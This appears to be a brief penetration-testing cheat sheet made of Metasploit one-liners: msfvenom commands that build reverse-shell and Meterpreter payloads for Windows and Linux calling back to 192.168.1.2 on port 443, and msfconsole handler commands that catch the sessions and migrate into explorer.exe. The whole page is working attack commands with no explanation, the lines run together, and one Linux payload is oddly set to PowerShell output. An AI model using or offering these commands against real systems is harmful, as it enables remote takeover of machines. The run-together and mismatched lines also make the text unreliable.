Payloads
Payloads
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.1.2 LPORT=443 EXITFUNC=thread -f ps1msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 EXITFUNC=thread -f ps1msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 EXITFUNC=thread -f ps1msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 EXITFUNC=thread -f ps1Listeners
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.1.2; set LPORT 443; set AutoRunScript migrate -n explorer.exe; exploit"msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_https; set LHOST 192.168.1.2; set LPORT 443; set AutoRunScript migrate -n explorer.exe; exploit"Last updated